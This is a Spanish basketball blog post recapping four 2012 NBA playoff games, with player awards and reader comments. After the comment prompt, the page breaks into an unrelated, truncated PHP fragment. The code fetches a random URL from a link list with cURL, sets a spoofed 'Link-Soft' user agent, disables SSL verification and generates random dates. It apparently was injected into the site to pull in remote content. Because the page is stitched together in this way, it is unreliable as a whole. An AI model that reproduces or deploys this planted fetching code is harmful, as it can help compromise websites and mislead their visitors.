La Crónica: Minutos decisivos

06 de May de 2012 por MagicJohnson32

Los todavía vigentes campeones son el primer equipo eliminado de los Playoffs 2012. Pese a ser barridos, cayeron dando guerra. Fue la tónica general de la madrugada, en la que los cuatro partidos disputados estuvieron más o menos equilibrados. Por partes:

Los Clippers recuperaron la ventaja en su eliminatoria contra los Grizzlies tras un encuentro que se ciñó al guion previsto: se peleó por cada rebote y cada posesión como si se tratase de un séptimo partido. Hubo muchas pérdidas, muchos tiros libres y un final de infarto. El terreno parecía propicio para Memphis, que se desenvuelve en el barro como nadie. Además, los de Hollins controlaron el ritmo del partido y el rebote durante casi toda la noche. Pero, sin llegar a lo del primer partido de la serie, el ataque de los Grizzlies se colapsó en el último cuarto y Chris Paul se las ingenió una vez más para producir en el tramo decisivo pese a la magnífica defensa de O.J. Mayo. Parecía que los Clippers lo tenían ganado cuando dos triples asombrosos de Rudy Gay en los segundos finales, seguidos de dos tiros libres fallados por Bledsoe, dieron a los Grizzlies la oportunidad de llevarse el triunfo. Conley se la dio a Gay, quien en un tiro a la desesperada y con rectificado, falló (86-87).

También se vivió un final repleto de emoción en Orlando. Pese a perder (101-99) y quedar al borde de la eliminación, los Magic merecen nuestro elogio. En un encomiable ejercicio de fe liderado por Glen Davis y Jason Richardson, los de Florida forzaron la prórroga con un triple de Redick tras haberse visto 19 abajo a 8 minutos para el final. Decidió en el tiempo extra una falta de Nelson sobre George Hill con solo dos segundos por jugarse. Tras los tiros libres de Hill, el intento sobre la bocina de Glen Davis no entró y la eliminatoria regresa a Indianapolis con todos los números para acabar 4-1. David West fue de nuevo el mejor de los Pacers, con 25 puntos y 12 rebotes, bien acompañado en la pintura por los 14 puntos, 11 rebotes y 3 tapones de Hibbert, así como una excelente labor de todo el banquillo.

En Dallas, los actuales campeones parecían decididos a evitar la barrida. A falta de 10 minutos para el final del partido vencían de 13 puntos y tanto Nowitzki como Kidd parecían haber sido configurados previamente en “modo Playoffs”. Pero a partir de ese momento empezó el show de James Harden. En 3 minutos anotó 9 puntos y los Thunder remontaron el partido con un parcial de 12-0. A falta de 5 minutos, las tornas habían cambiado y Oklahoma ya estaba por delante con todo a su favor. Tocados anímicamente, los Mavs ya no pudieron ni luchar por el partido. Entre el trío maravilla y Derek Fisher (enorme en lo suyo) mataron el partido y la eliminatoria (103-97). Dallas se va para casa con un 4-0 menos de un año después de ganar brillantemente el anillo. Decandencia.

San Antonio tambíen está a un paso de acabar su eliminatoria por la vía rápida. Anoche pusieron el 3-0 en un partido muy igualado durante los dos primeros cuartos y que parecían resolver en el tercero. Sin embargo, en el último la cosa se les pudo complicar cuando los Jazz se pusieron a 5 puntos. A partir de ahí, Tony Parker sacó a relucir todo su arsenal y experiencia y con 16 puntos inmaculados (ni un fallo en tiros de campo ni tiros libres) volvió a otorgar a los Spurs una cómoda ventaja que ya mantuvieron hasta el final del partido. Derrick Favors disfrutó de más minutos que en los partidos previos y estuvo especialmente brillante en el segundo y en el último cuarto (102-90).

PREMIOS

MVP: Va de grandes últimos cuartos como los que protagonizaron tanto James Harden (15 puntos) como Tony Parker (16 puntos). En total el primero se fue a los 29 puntos, 5 rebotes, 5 asistencias y 3 robos y el segundo a los 27 puntos y 6 asistencias.

Rookie: Relativo buen partido de Alec Burks, que anotó 11 puntos. No le vamos a pedir más a un rookie en Playoffs ¿no?

Sorpresa: Derek Fisher disputó 30 minutos, en los que anotó 12 puntos con un 5 de 6 en tiros de campo. Al final, los Lakers le pueden echar de menos.

Decepción: Los campeones se van a casa tras ser barridos en primera ronda de Playoffs. ¿Empieza un nuevo ciclo en los Dallas Mavericks?

Esfuerzo en vano: Durante buena parte del parte del partido Dirk Nowitzki mantuvo a los Mavs en la eliminatoria. Lástima que en el último cuarto también se colapsara, junto al resto del equipo. Acabó con 34 puntos, 5 rebotes y 4 asistencias.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. arvydas dice:
    #1

    La sorpresa parece que la ha escrito MagicJohnson32, oh wait…!!!

    Es broma, opino lo mismo… jajaja

      Citar

  2. nba dice:
    #2

    De Dallas poco que decir, Cuban ha querido que sea asi, lastima desperdiciar un buen año para Dirk.
    Grizzlies-Clippers tiene toda la pinta que sera un 4-3.
    Spurs ?? que pase el siguiente.
    indiana haciendo lo que se espera de ella por plantilla.
    Veremos si esta noche los Lakers deciden darle mas ventaja a OKC o deciden de una vez que es hora de dejar de hacer el tonto.
    Porque con lo descansados que van a estar Okc,mas vale que Lakers y sobre todo su defensa del perimetro se ponga de una vez las pilas.

      Citar

  3. Nacho dice:
    #3

    Tengo que decir que el triple de Reddick me levantó del sofá, y eso que no soy de los Magic. Enorme cuarto cuarto. Si no se desenchufasen tanto, y si hubiesen cambiado a pelo a Howard por un Bynum, o Gasol seguirían siendo competitivos.
    Por otro lado West tiene buenos números, e hizo un muy buen tercer cuarto, pero el que sostuvo a Indiana tras el arreón de Orlando fue George Hill. Sin él, el partido se hubiera quedado en casa. Y la absurda última falta creo que es de Richardson. Una pena, Orlando merece volver al Anway Arena, y dudo que sea así.

    Grizzlies, tenemos un problema. Son muy superiores pero no rematan. Se dejan comer la tostada fácilmente, y Paul en eso es draculín, ve sangre, y muerde.

      Citar

  4. MagicJohnson32 dice:
    #4

    Nacho:Y la absurda última falta creo que es de Richardson.

    A mí también me pareció de Richardson, que engancha a Hill en el antebrazo, pero se la pitaron a Nelson 😉

      Citar

  5. HisRoyalAirness dice:
    #5

    Hola chavales, he vuelto. Mi retiro tiene sus razones de peso pero no vienen al caso. Se os echaba de menos.

    He ido siguiendo lo que podía y una cosa tengo clara, como la he tenido todo el año: el Este apesta. Lo de la lesión de Rose ya fue para decir “ok Heat, jugad ya la Final”. La ventaja física con la que van a llegar, sea contra quien sea, debido a los plácidos PO que les van a tocar (a no ser que los verdes tengan algo que decir al respecto) va a ser un escándalo.
    En el Oeste se parten la cara desde primera ronda. Nuestro querido Dirk está fuera pero el 4-0 creo que no hace justicia. Os veo muy convencidos con los Thunder pero la merienda de negros que pueden prepararles Pau y Bynum en la pintura puede ser importante eh? Lo veo muy igualado.
    Lo que me está decepcionando un poco es la pizarra de Grizzlies. Quién es tu único All-Star? Por qué tira menos de 10 veces por partido? Con lo fácil que sería nutrir a Marc y Z-Bo de balones para sacarles falta a los saltimbanquis de los otros. No me lo explico.

      Citar

  6. Denise dice:
    #6

    Si Orlando traspasa a Howard, debe meter a Turkoglu en el trade, vaya playoffs de mierda está haciendo. Hasta por el inepto de Metta WP cambiaría al turco

      Citar

  7. nba dice:
    #7

    Tanto como inepto Denise, aunque tiene altas probabilidades de que se le crucen los cables, MWP es un buen defensor.
    En cambio el turco parece que es del club “se dejaba llevar”, a este si que habria que darle palos teniendo en cuenta el contrato que tiene

      Citar

  8. German dice:
    #8

    Vaya serie la de Clippers y Grizzlies, grandisimos partidos hasta ahora. Increiblemente los Clippers salieron airosos a un 13-30 en tiros libres.
    Coincido con HisRoyal, deben tener mas tiros sus interiores, sabemos que Griffin no aporta demasiado en defensa, pueden perforar por ahi y no solo tener vias de gol sino tambien sacarle faltas para que permanezca mas tiempo en la banca y debilitar su ofensiva

      Citar

  9. Esteban dice:
    #9

    cp3 se llevara esta eliminatoria y entrara a la carrera por MVP, pocos jugaodres pueden ser tan decisivos como el en minutos finales

    me temia algo asi en los angeles, los clippers pese a griffin viven de sus tiradores, sobretodo mo y foye, y cada tanto bulter que se va hasta los 20, pero los dos primeros de local son dos metralletas tremendas, ojo, de local, de visitante foye desaparece, pero en los angeles son dos tios capaz de irse hasta los 4 triples cada uno

    aplauso para la dirigencia de los clippers, aun perdiendo a billups y sin entrar en el impuesto de lujo, tienen una banca a la altura de cualquiera, y quiza mejor, bledsoe, mo, young, simmons, evans y martin, algo mas?

      Citar

  10. Lucho dice:
    #10

    Rondo lleva ya 7 asistencias en el primer cuarto. Sensacional
    La picada a Garnett es celestial

      Citar

  11. Lucho dice:
    #11

    Que lujo verlo jugar. Show de Rondo
    13 asistencias en la primer mitad, magia pura

      Citar

  12. German dice:
    #12

    Lucho:
    Que lujo verlo jugar. Show de Rondo
    13 asistencias en la primer mitad, magia pura

    +1

    Da gusto ver un jugador asi. Tremenda paliza de los Celtics a Atlanta, por favor ojala sigan asi y puedan pelearle al Heat

      Citar

  13. GreenPride dice:
    #13

    Bueno pues como voy con retraso voy a comentar los partidos de este día.
    Los Spurs hacen buenos los pronósticos de que este año sería diferente y se meriendan a los Jazz. Parece que nadie les da favoritos para el anillo pero yo creo que pueden estar en la pomada si el Big Threee sigue sano.
    Lo de Dallas no es ninguna sorpresa, sólo que yo si esperaba que cayeran rascando un par de partidos. La verdad es que la eliminatoria no ha sido una barrida en cuanto a juego con 3 de los 4 partidos muy igualados pero OKC ha demostrado que este año sí tienen las cosas claras en el clutch. Nada de darle la bola a Westbrook, bolas a Harden para que decida si se la juega o pasa a las alas donde Durantula y Westbrook esperan buscándose sus tiros. Harden es un jugadorazo, con mucha clase, gran penetrador y con buena visión de juego y suele elegir bastante bien que hacer. En este 4º partido además estuvo tremendo volviendo loca a toda la defensa de los Mavs y creando canasta tras canasta para él o para los compañeros. Todavía queda por ver a Oklahoma ante un toro grande y la eliminatoria con los Lakers podría dar la medida de sus posibilidades de anillo. Yo también la veo muy igualada aunque ya tocará hablar de eso. En los Mavs, Cuban decidió un año de transición y liberar espacio para ir a por Howard y Deron este verano, veremos que tal le sale la jugada.
    Mi enhorabuena a los Magic que no se están dejando llevar y estan haciendo sudar la gota gorda a los Pacers. Estos acaban imponiendo su plantillón como era de esperar sin Superman pero les está costando un mundo conseguirlo. Veremos que pasa con estos Pacers contra los Heat y si pueden darles guerra.
    Y llegamos a la eliminatoria…. Grizzlies-Clippers ya se preveía como el gran atractivo de primera ronda y está cumpliendo las espectativas. 2 equipos muy diferentes jugando con el cuchillo en una serie que promete ser apasionante. Los Grizzlies dominaron el partido a base de su defensa de las líneas de pase y de la superioridad interior y de Rudy Gay sobre sus pares a pesar de que sorprendentemente jugó Butler. Son un equipo que sigue un ritmo alto y con grandes interiores a los que este año deberían abastecer más como comentáis algunos. Enfrente los Clippers son un equipo mucho más de rachas, ya que gran parte de su potencial ofensivo está en sus tiradores (Mo, Young, Foye) y con la gran suerte de tener un genio en el puesto de base. De momento el gran CP3 está decidiendo en los últimos cuartos y por ahí podrían llevarse la eliminatoria los de LA. Para mí, los Grizzlies son mejor equipo pero si se sigue llegando a finales apretados mucho me temo que darle el balón a CP3 es bastante mejor que a Gay en esos momentos decisivos. Aún así queda mucha tela que cortar y los Grizzlies saldrán a muerte en el 4º para igualar. Si lo consiguen creo que iremos al 7º. La eliminatoria será apasionante.
    Aprovecho para comentar la paliza de Boston a Atlanta. Enorme todo el equipo verde y decepcionantes Hawks. Volvían Josh y Horford pero el carácter competitivo y el Garden se los llevaron por delante junto a todo el equipo de Atlanta. Rondo hizo otro partido para el recuerdo con 7 asistencias en los primeros 5 minutos de partido y acertando hasta en sus lanzamientos exteriores y Pierce se rió de la defensa de Atlanta. Poco que salvar de unos Hawks que volvieron a demostrar no tener el espíritu necesario para ser un equipo puntero. Ahora tienen una montaña que levantar con este 3-1 ante los Celtics y sinceramente creo que la serie acabará en el Garden en el 6º partido. Si los Celtics llegan sanos creo que pueden pasar esta y la siguiente ronda y ser un dolor de cabeza para los Heat. ¿Pueden volver a hacer lo de hace 2 años cuando casi se llevan el anillo sin que nadie contara con ellos? Yo creo que no, pero lo mismo creía hace 2 temporadas….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>